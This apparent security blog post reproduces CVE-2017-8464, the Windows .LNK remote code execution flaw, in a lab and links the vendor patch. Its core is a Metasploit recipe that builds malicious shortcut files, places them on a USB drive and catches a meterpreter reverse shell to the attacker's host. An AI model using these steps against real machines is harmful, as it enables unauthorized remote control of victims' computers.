首页 » NetworkSec » AWD » 正文

stuxnet repeat(cve-2017-8464)

0x01 Overview

In June 2017,Microsoft posted a patch for cve-2017-8464,this bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka “LNK Remote Code Execution Vulnerability.”.
It like stuxnet,so some people call it the three generations of stuxnet.In this article,I will repeat cve-2017-8464.

0x02 The effects of range

Windows 7 SP1
Windows 8
Windows 8.1
Windows RT 8.1
Windows 10 Gold, 1511, 1607, 1703
Windows Server 2008 SP2 and R2 SP1
Windows Server 2012 Gold and R2
Windows Server 2016

0x03 Trigger conditions

1.Open automatically play(It worked!)
2.Browse the catalog(It worked!
3.Access the file directory through a network share(I did not test this)

0x04 Bug repeat

Environment:
Drone: win7(32bit)
Attacker: kali
Tools: MSF,u disk
Step 1:
Download the last metasploit,then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat.
And copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits.
Step 2:
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your ip
exploit
Step 3:
cp /root/.msf4/local/ /root/cve-2017-8464-lnk
Step 4:
cp the all 24 files to the root folder of the target USB drive
Step 5:
use multi/handler
set paylaod windows/meterpreter/reverse_tcp
set LHOST your ip
run
Step 6:
insert your usb to target computer,then you will get a reverse shell.

PS: the .cpl file must in  the root folder of the target USB drive!

0x05 Repair

Get the patch from MS:
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464

0x06 Conclusion

I think this bug is so cool,it like stuxnet,powful and easy to use,so get the patch as fast as possible.

0x07 Reference

1.https://cve.mitre.org/data/downloads/allitems-cvrf-year-2017.xml
2.http://www.4hou.com/system/6938.html
3.http://www.freebuf.com/news/143356.html
 

Comment

please input captcha *